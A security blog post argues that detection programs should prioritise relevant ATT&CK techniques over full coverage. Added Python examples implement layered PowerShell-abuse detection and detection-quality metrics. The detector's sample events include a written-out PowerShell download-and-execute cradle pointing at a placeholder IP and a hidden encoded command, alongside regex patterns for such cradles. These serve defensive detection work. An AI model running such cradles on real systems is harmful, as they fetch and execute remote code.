"We need 100% MITRE ATT&CK coverage" is the new "we need zero vulnerabilities." It sounds great in a board presentation, but it's the wrong goal.
Here's why, and what you should measure instead.
The coverage trap
MITRE ATT&CK has 196 techniques (as of v14). Building a high-fidelity detection for each one would require:
- ~400-600 detection rules (accounting for sub-techniques)
- ~1,000 test cases (true positives and false positives)
- ~50,000 lines of documentation
- Ongoing maintenance as ATT&CK evolves twice a year
And here's the kicker: most of those techniques don't apply to your environment.
Are you running ICS/SCADA systems? If not, you don't need detections for Modbus or DNP3 protocols. Do you have iOS devices in your SOC's scope? If not, you can skip 30+ mobile techniques.
Start with realistic threat scenarios
Instead of treating ATT&CK as a checklist, use it as a framework to map realistic threats:
Step 1: Identify your adversaries
Who actually targets organizations like yours?
- Ransomware gangs (everyone)
- Nation-state APTs (if you're critical infrastructure, defense, or high-value IP)
- Insiders (financial services, healthcare)
- Opportunistic attackers (exposed infrastructure)
Step 2: Map their typical kill chains
What techniques do they commonly use?
Example: Ransomware kill chain
Initial Access → T1566.001 (Phishing: Attachment)
Execution → T1059.001 (PowerShell)
Persistence → T1547.001 (Registry Run Keys)
Privilege Escalation → T1055 (Process Injection)
Defense Evasion → T1562.001 (Disable AV)
Lateral Movement → T1021.001 (RDP)
Impact → T1486 (Data Encrypted for Impact)
That's 7 techniques. Build high-fidelity detections for these before worrying about obscure nation-state techniques.
Step 3: Layer your detections
Don't rely on a single detection per technique. Build multiple layers:
Example: Detecting T1059.001 (PowerShell abuse)
- Layer 1: PowerShell with suspicious flags (-EncodedCommand, -NoProfile)
- Layer 2: PowerShell spawned by unusual parent processes (e.g., Excel, Outlook)
- Layer 3: PowerShell making external network connections
- Layer 4: PowerShell downloading files from internet
Multiple layers = higher chance of detection, even if attacker evades one layer.
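The four layers above, written out as detection logic and run over a handful of constructed process events. This is an added example, not code from the original post: the ProcessEvent fields stand in for Sysmon-style process-creation telemetry joined with the process's network connections, the flag and download-cradle patterns are a starting list rather than a complete one, and the sample command lines, parents and destination addresses are constructed.

```python
"""Layered detection for T1059.001 (PowerShell abuse) over constructed telemetry.

Added example, not code from the original post. ProcessEvent mimics Sysmon-style
process-creation plus network telemetry joined per process; field names and the
sample events are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass, field

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "outlook.exe", "powerpnt.exe"}

# Layer 1: flags used to run PowerShell silently or with an encoded payload.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:enc|encodedcommand|nop|noprofile|w(?:indowstyle)?\s+hidden)\b"
)
# Layer 4: common download cradles visible in a plain-text command line.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer)"
)
# Only RFC 1918, loopback and link-local count as internal here; extend with your
# own address plan. (ipaddress.is_private would also treat the documentation
# ranges used in the samples below as internal.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class ProcessEvent:
    image: str              # full path of the started process
    command_line: str
    parent_image: str       # full path of the parent process
    dest_ips: list[str] = field(default_factory=list)  # outbound connections by this process


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_powershell(ev: ProcessEvent) -> bool:
    return _basename(ev.image) in POWERSHELL_IMAGES


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def layer1_suspicious_flags(ev: ProcessEvent) -> bool:
    return SUSPICIOUS_FLAGS.search(ev.command_line) is not None


def layer2_unusual_parent(ev: ProcessEvent) -> bool:
    return _basename(ev.parent_image) in OFFICE_PARENTS


def layer3_external_network(ev: ProcessEvent) -> bool:
    return any(is_external(ip) for ip in ev.dest_ips)


def layer4_download_from_internet(ev: ProcessEvent) -> bool:
    # Requiring an external destination keeps intranet Invoke-WebRequest use quiet.
    return DOWNLOAD_CRADLE.search(ev.command_line) is not None and layer3_external_network(ev)


LAYERS = [
    ("L1-suspicious-flags", layer1_suspicious_flags),
    ("L2-unusual-parent", layer2_unusual_parent),
    ("L3-external-network", layer3_external_network),
    ("L4-download-from-internet", layer4_download_from_internet),
]


def evaluate(ev: ProcessEvent) -> list[str]:
    """Names of the layers that fire for one event (empty if not PowerShell)."""
    if not is_powershell(ev):
        return []
    return [name for name, check in LAYERS if check(ev)]


def triage(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Verdict per event: two or more independent layers firing is worth analyst time."""
    out = []
    for ev in events:
        fired = evaluate(ev)
        verdict = "investigate" if len(fired) >= 2 else "low-confidence" if fired else "none"
        out.append((verdict, fired))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcessEvent(PS, "powershell.exe -NoProfile -Command Get-Service", r"C:\Windows\explorer.exe"),
    ProcessEvent(PS, "powershell.exe -nop -w hidden -enc QQBBAEEA",  # constructed, decodes to 'AAA'
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", ["203.0.113.10"]),
    ProcessEvent(PS, "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/u.ps1')",
                 r"C:\Windows\System32\cmd.exe", ["203.0.113.5"]),
    ProcessEvent(PS, "powershell.exe -Command Invoke-WebRequest http://intranet/report.csv -OutFile r.csv",
                 r"C:\Windows\explorer.exe", ["10.0.0.5"]),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", r"C:\Windows\explorer.exe", ["203.0.113.9"]),
]

if __name__ == "__main__":
    for ev, (verdict, fired) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{verdict:15} {fired}  <- {ev.command_line[:60]}")
```

Two things the run shows that the list alone does not: the second event carries an encoded payload, so Layer 4 never sees a cradle, yet Layers 1 to 3 still fire together; and the intranet Invoke-WebRequest in the fourth event stays quiet only because Layer 4 is gated on an external destination. That gating is the kind of tuning the "important" tier calls for below.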
Prioritize "must-detect" techniques
Not all techniques are equally important. Categorize by:
Critical (must detect)
- Initial Access (phishing, exploit public-facing apps)
- Credential Access (dumping LSASS, password spraying)
- Lateral Movement (RDP, PsExec, WMI)
- Impact (ransomware, data destruction)
These are high-signal, high-impact techniques. False positives are acceptable if it means catching these.
Important (should detect)
- Execution (suspicious scripting, macro execution)
- Persistence (scheduled tasks, startup items)
- Defense Evasion (clearing logs, disabling AV)
These indicate active compromise. Invest in tuning to reduce false positives.
Nice-to-have (can wait)
- Discovery (network scans, user enumeration)
- Collection (screen capture, clipboard data)
- Exfiltration (unusual outbound traffic)
These are often noisy and context-dependent. Build detections after covering the critical techniques.
Measure quality, not just coverage
Instead of "% of ATT&CK techniques covered," track:
Detection depth
How many layers of detection do you have per critical technique?
- Goal: 3+ layers for critical techniques
- Goal: 2+ layers for important techniques
True positive rate
What % of your alerts represent real threats?
- Goal: >80% TP rate for critical techniques
- Goal: >50% TP rate for important techniques
Validation cadence
How often do you test your detections?
- Goal: Red team exercises quarterly
- Goal: Purple team detection validation monthly
- Goal: Continuous testing via attack simulation tools
Tools for tracking coverage
Open-source options
- ATT&CK Navigator: Visualize your coverage as a heatmap
- DeTT&CT: Score detection quality, not just presence
- Atomic Red Team: Run real attacks to validate detections
Commercial options
- AttackIQ: Continuous security validation
- SafeBreach: Automated breach simulation
- Cymulate: Full kill chain simulation
We typically start clients with ATT&CK Navigator + Atomic Red Team (free) before investing in commercial tools.
Real-world coverage example
Here's what realistic coverage looks like for a mid-sized fintech:
Total ATT&CK techniques: 196
Relevant to environment: 82 (42%)
Covered with high-fidelity detections: 45 (55% of relevant)
Coverage breakdown:
- Critical techniques: 28/28 (100%)
- Important techniques: 12/34 (35%)
- Nice-to-have techniques: 5/20 (25%)
This organization has ~23% overall ATT&CK coverage but 100% coverage of techniques that matter. That's a win.
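The quality metrics from "Measure quality, not just coverage" and the tiered breakdown above, computed from a small detection inventory and emitted as an ATT&CK Navigator layer scored by detection depth. This is an added example, not code from the original post or from any of the tools it names: the tiers reuse the ransomware kill chain and the "must-detect" techniques from earlier sections (the technique IDs are real), while the rule names, the TP/FP counts, the absence of a TP goal for nice-to-have techniques and the Navigator version fields are assumptions.

```python
"""Detection-quality metrics over a constructed detection inventory.

Added example, not code from the original post. Tiers, rule names and TP/FP
counts are constructed; only the ATT&CK technique IDs are real.
"""
import json
from collections import defaultdict

# Tiering in the post's terms: the ransomware kill chain plus techniques named
# in the "must-detect" section.
TIERS = {
    "critical":  ["T1566.001", "T1003.001", "T1110.003", "T1021.001", "T1486"],
    "important": ["T1059.001", "T1547.001", "T1055", "T1562.001", "T1053.005"],
    "nice":      ["T1087", "T1113"],
}
# Goals from the post: depth = independent detection layers per technique,
# tp = share of alerts that were true positives in the last validation period.
GOALS = {
    "critical":  {"depth": 3, "tp": 0.80},
    "important": {"depth": 2, "tp": 0.50},
    "nice":      {"depth": 1, "tp": None},  # assumption: no TP goal for nice-to-have
}
# Constructed inventory: (rule name, technique, true positives, false positives).
DETECTIONS = [
    ("phish-macro-attachment",      "T1566.001", 40, 5),
    ("phish-iso-lnk-attachment",    "T1566.001", 20, 10),
    ("phish-archive-with-script",   "T1566.001", 10, 0),
    ("lsass-handle-from-nonsystem", "T1003.001", 15, 1),
    ("lsass-minidump-on-disk",      "T1003.001", 5, 0),
    ("spray-many-users-one-source", "T1110.003", 30, 30),
    ("rdp-from-workstation",        "T1021.001", 12, 2),
    ("rdp-new-source-to-server",    "T1021.001", 8, 2),
    ("rdp-after-hours-admin",       "T1021.001", 4, 0),
    ("ps-suspicious-flags",         "T1059.001", 10, 2),
    ("ps-office-parent",            "T1059.001", 8, 1),
    ("ps-external-network",         "T1059.001", 20, 30),
    ("ps-download-cradle",          "T1059.001", 5, 0),
    ("runkey-added-by-user-proc",   "T1547.001", 3, 12),
    ("remote-thread-cross-proc",    "T1055", 6, 1),
    ("hollowed-image-mismatch",     "T1055", 2, 2),
    ("schtask-from-script-host",    "T1053.005", 9, 9),
    ("schtask-runs-from-temp",      "T1053.005", 1, 0),
    ("net-user-domain-burst",       "T1087", 2, 50),
]


def tier_of(tid: str) -> str:
    return next(tier for tier, ids in TIERS.items() if tid in ids)


def depth_by_technique(detections) -> dict[str, int]:
    """Detection depth: number of rules (layers) per technique."""
    depth = defaultdict(int)
    for _, tid, _, _ in detections:
        depth[tid] += 1
    return dict(depth)


def tp_rate_by_technique(detections) -> dict[str, float]:
    """True-positive rate per technique, pooled across its rules."""
    tp, total = defaultdict(int), defaultdict(int)
    for _, tid, t, f in detections:
        tp[tid] += t
        total[tid] += t + f
    return {tid: (tp[tid] / total[tid] if total[tid] else 0.0) for tid in total}


def meets_goals(tid: str, depth: dict, tp_rate: dict) -> bool:
    goal = GOALS[tier_of(tid)]
    if depth.get(tid, 0) < goal["depth"]:
        return False
    return goal["tp"] is None or tp_rate.get(tid, 0.0) >= goal["tp"]


def tier_rollup(detections) -> dict[str, dict[str, int]]:
    """Per tier: how many techniques have any rule vs. how many meet the goals."""
    depth, tpr = depth_by_technique(detections), tp_rate_by_technique(detections)
    return {
        tier: {
            "total": len(ids),
            "any_detection": sum(1 for t in ids if depth.get(t, 0) > 0),
            "meets_goals": sum(1 for t in ids if meets_goals(t, depth, tpr)),
        }
        for tier, ids in TIERS.items()
    }


def navigator_layer(detections, name: str = "Detection depth") -> dict:
    """Minimal ATT&CK Navigator layer scored by depth; version fields are assumed."""
    depth, tpr = depth_by_technique(detections), tp_rate_by_technique(detections)
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},  # assumption
        "domain": "enterprise-attack",
        "techniques": [
            {"techniqueID": tid, "score": depth.get(tid, 0),
             "comment": f"{tier} | layers={depth.get(tid, 0)} tp_rate={tpr.get(tid, 0.0):.0%}"}
            for tier, ids in TIERS.items() for tid in ids
        ],
    }


if __name__ == "__main__":
    for tier, counts in tier_rollup(DETECTIONS).items():
        print(f"{tier:10} {counts}")
    print(json.dumps(navigator_layer(DETECTIONS), indent=2))
```

The rollup separates "has a rule" from "meets the goal": in this inventory four of five critical techniques have some detection, but only two reach 3+ layers at 80% TP, because T1003.001 stops at two layers and the password-spray rule is a single noisy layer. That gap is what a plain coverage percentage hides. The layer dictionary can be saved as JSON and opened in ATT&CK Navigator to get the heatmap mentioned in the tools section.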
When "low coverage" is actually fine
Some techniques are better prevented than detected:
- T1078 (Valid Accounts): Use MFA and least privilege instead of trying to detect legitimate-looking logins
- T1071 (Application Layer Protocol): Block C2 domains at the firewall instead of trying to detect beaconing in logs
- T1027 (Obfuscated Files): Use application allowlisting instead of trying to detect every obfuscation technique
Don't build detections just to increase coverage. Focus on techniques where detection is your best defense.
Conclusion
Aim for 100% coverage of relevant, high-priority techniques - not 100% coverage of ATT&CK. Your analysts will thank you, and you'll actually catch the threats that matter.
Start with threat modeling, prioritize realistically, and measure detection quality over quantity.
Want help building a threat-informed detection program? Contact us to discuss how our Forward-Deployed Engineers can help.